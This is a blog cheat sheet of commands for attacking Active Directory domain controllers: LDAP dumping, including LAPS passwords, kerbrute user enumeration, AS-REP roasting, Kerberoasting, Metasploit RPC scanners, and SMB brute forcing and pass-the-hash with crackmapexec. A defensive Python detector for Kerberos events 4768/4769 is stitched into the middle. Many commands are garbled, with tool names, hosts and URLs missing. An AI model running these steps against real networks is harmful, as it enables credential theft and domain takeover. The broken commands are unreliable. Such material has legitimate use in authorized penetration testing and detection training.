Pentesting Domain Controllers Cheatsheet

In this blog post, we share a comprehensive cheatsheet for pentesting those powerful and critical domain controllers. Now, I know what you're thinking: "But why, oh wise one, do we need such a guide?" Well, let me tell you: domain controllers are the repositories of your organization's most sensitive information - user credentials, group policies, and so on. If they are not secured properly, they can lead to catastrophic data breaches or even complete system takeovers!

So buckle up as we explore various techniques and tools for testing the security of domain controllers. From identifying potential vulnerabilities to exploiting them, we've got you covered with practical examples, real-life scenarios, and actionable insights. So stay tuned and prepare yourself for a rollercoaster ride through the fascinating world of pentesting!

Note: Before proceeding with pentesting any system, it is essential to have proper authorization from the relevant authorities and to follow ethical guidelines. Happy learning!

This is just a brief/quick guide on what and how to pentest on a domain controller without digging too deep. If you are looking for a comprehensive guide, you can refer to my ACTIVE DIRECTORY PENETRATION TESTING CHEAT SHEET - RECON & INITIAL ACCESS and ACTIVE DIRECTORY PENTEST CHEAT SHEET - LATERAL MOVEMENT & PERSISTENCE TECHNIQUES.


DNS Enumeration

dig srv @DC_IP #Query ldap service
dig +short srv @DC_IP #query Root Domain Controller
dig +short a @DC_IP


LDAP Enumeration

#Nmap Scan for basic info
nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269
#Get Domain name
ldapsearch -x -h -s base namingcontexts
ldapsearch -H ldap:// -x -s base namingcontexts
#Look for misconfigs - Finding ms-MCS-AdmPwd
ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
#Dump Everything
ldapsearch -LLL -x -H ldap:// -b '' -s base '(objectclass=*)'
#Dump Everything using ldeep
ldeep ldap -a -d STEINS.local -s ldap:// all dump


User Enumeration

The objective is to gather as many valid usernames as possible. Try to figure out the username format used by the organization from their email addresses or through social engineering.

Example Name: John Smith
Usernames: John.Smith, JohnS, Sjohn, SmithJ, JSmith, John.s

Work out the format and create a wordlist for yourself; you can use the git repo below as a reference to build a list of usernames.

git clone
cd Wordlists/Usernames
# User Enumeration to find Valid Usernames
kerbrute userenum --dc -d Common_names.txt

Find Pre-Auth Disabled Users

DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip
#AD Module - Finding users with PreauthNotRequired set
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Run Powershell AD Commands with Credentials

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain\UserName', $SecPassword)
Get-ADUser -Identity user1 -Credential $Cred
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth -Server -Credential $Cred


Service Principal Names & TGS Tickets

#Listing users with ServicePrincipalName set using AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
#Get TGS Ticket Using
sudo -request -dc-ip Steins.local/mark
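The user enumeration, pre-auth-disabled and SPN/TGS steps above all leave a footprint in the domain controller's Security log. The following detection logic is an added example (not code from this post) that runs over constructed 4768/4769 event records; field names follow the Security log's EventData names, while the sample values and the thresholds are assumptions for this example.

```python
"""Detection logic for the Kerberos recon steps in this cheat sheet, run over constructed
Windows Security events 4768 (TGT request) and 4769 (TGS request). Field names follow the
Security log's EventData; sample values and thresholds are assumptions for this example."""
from collections import defaultdict

IP = "10.0.0.5"  # constructed client address used by the three noisy patterns
# kerbrute-style user enumeration: rapid 4768 failures with Status 0x6 (principal unknown)
SAMPLE_EVENTS = [(4768, 100 + i, {"TargetUserName": u, "IpAddress": IP, "Status": "0x6"})
                 for i, u in enumerate(["john.smith", "jsmith", "johns", "sjohn", "smithj"])]
# AS-REP roast: TGT issued with PreAuthType 0 (pre-auth not required) and RC4 (0x17)
SAMPLE_EVENTS.append((4768, 200, {"TargetUserName": "svc_backup", "IpAddress": IP,
                                  "Status": "0x0", "PreAuthType": "0",
                                  "TicketEncryptionType": "0x17"}))
# Kerberoast: one client requests RC4 service tickets for several SPN accounts
SAMPLE_EVENTS += [(4769, 300, {"TargetUserName": "mark", "IpAddress": IP, "ServiceName": s,
                               "TicketEncryptionType": "0x17"})
                  for s in ["svc_sql", "svc_http", "svc_mssql"]]
# benign: a normal AES-encrypted (0x12) service ticket from another host
SAMPLE_EVENTS.append((4769, 302, {"TargetUserName": "alice", "IpAddress": "10.0.0.9",
                                  "ServiceName": "cifs/fs01", "TicketEncryptionType": "0x12"}))

def detect(events, window=60, enum_threshold=5, roast_threshold=3):
    """Return (alert_type, client_ip, detail) tuples for the three patterns."""
    alerts = []
    unknown = defaultdict(list)  # ip -> timestamps of 0x6 failures
    rc4_spns = defaultdict(set)  # ip -> distinct services requested with RC4
    for event_id, ts, f in events:
        ip = f.get("IpAddress", "?")
        if event_id == 4768 and f.get("Status") == "0x6":
            unknown[ip].append(ts)
        elif (event_id == 4768 and f.get("PreAuthType") == "0"
              and f.get("TicketEncryptionType") == "0x17"):
            alerts.append(("asrep_roast", ip, f["TargetUserName"]))
        elif event_id == 4769 and f.get("TicketEncryptionType") == "0x17":
            rc4_spns[ip].add(f["ServiceName"])
    for ip, stamps in unknown.items():  # enum_threshold failures inside a sliding window
        stamps.sort()
        for i in range(len(stamps) - enum_threshold + 1):
            if stamps[i + enum_threshold - 1] - stamps[i] <= window:
                alerts.append(("user_enum", ip, f"{len(stamps)} unknown-principal failures"))
                break
    for ip, spns in rc4_spns.items():
        if len(spns) >= roast_threshold:
            alerts.append(("kerberoast", ip, sorted(spns)))
    return alerts
```

The thresholds are starting points; tune them against your own 4768/4769 baseline, and remember that RC4-only service tickets are also a sign that the account still allows RC4, which is worth fixing on its own.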

SMB/rpc Access

Use this script for testing SMB & RPC; it will run the most common test cases on SMB:
-p 593
#RPC Endpoints enum via metasploit
msfconsole
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/dcerpc/endpoint_mapper
use auxiliary/scanner/dcerpc/hidden
use auxiliary/scanner/dcerpc/management
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
set rhosts
run

SMB Bruteforcing

#Basic SMB & OS info
crackmapexec smb
#List Shares
crackmapexec smb --shares
#passing blank creds via smb
crackmapexec smb --shares -u '' -p ''
#If the password needs to be changed
smbpasswd -U username -r
#Brute forcing SMB Creds
crackmapexec smb -u users.txt -p passwords.txt
#Bruteforcing SMB using hashes
proxychains crackmapexec -t 15 smb -u users -H hashes --no-bruteforce --continue-on-success


Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.
